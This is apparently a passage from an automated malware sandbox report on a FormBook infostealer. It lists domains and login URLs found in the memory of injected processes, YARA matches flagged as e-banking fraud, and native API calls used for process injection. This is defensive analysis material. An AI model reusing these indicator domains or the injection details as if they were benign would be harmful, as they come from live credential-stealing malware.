                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sidma.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartmonday.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.startuptalent.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tanhuazhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.testoprime.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.thebossclub.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.thecakelady.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.thecakelady.net/binding
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.thetilt.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.thetrees.net
                Source: SndVol.exe, 00000009.00000002.3769579301.00000000060FC000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.00000000036BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thinkphp.cn
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.togethertime.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.uwrf.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.webcruiser.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.webuyboats.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.westmedical.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.workandhealth.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wuhaozhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wuyezhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wuyuezhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wuyuezhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xianglizhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiangxiangzhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiaoaizhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiaoqizhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xingaizhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xinghuizhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xinghuizhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiuchangzhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xiupazhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xuanmozhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yanyangzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yanyuzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yechuizhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yewuzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yeyanzhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yeyuezhi.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yinhezhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yuemanzhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yumizhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yushenzhibo.com
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.yutongzhibo.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ziah.net
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zootech.net
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
                Source: SndVol.exe, 00000009.00000002.3761170910.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: SndVol.exe, 00000009.00000002.3761170910.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: SndVol.exe, 00000009.00000003.1861217165.000000000845B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: SndVol.exe, 00000009.00000002.3761170910.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: SndVol.exe, 00000009.00000002.3761170910.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033~
                Source: SndVol.exe, 00000009.00000002.3761170910.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: SndVol.exe, 00000009.00000002.3761170910.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://push.zhanzhang.baidu.com/push.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://white.anva.org.cn/
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.12377.cn/
                Source: SndVol.exe, 00000009.00000002.3771875465.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: SndVol.exe, 00000009.00000002.3771735517.0000000008150000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3769579301.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3768978242.0000000003074000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1970488679.0000000017234000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://zzlz.gsxt.gov.cn/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3768384183.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1669076954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1671103220.0000000001B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3768451567.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3768386121.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3757230807.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1671316261.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3768471999.0000000004260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0042CC83 NtClose,4_2_0042CC83
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752B60 NtClose,LdrInitializeThunk,4_2_01752B60
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01752DF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01752C70
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017535C0 NtCreateMutant,LdrInitializeThunk,4_2_017535C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01754340 NtSetContextThread,4_2_01754340
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01754650 NtSuspendThread,4_2_01754650
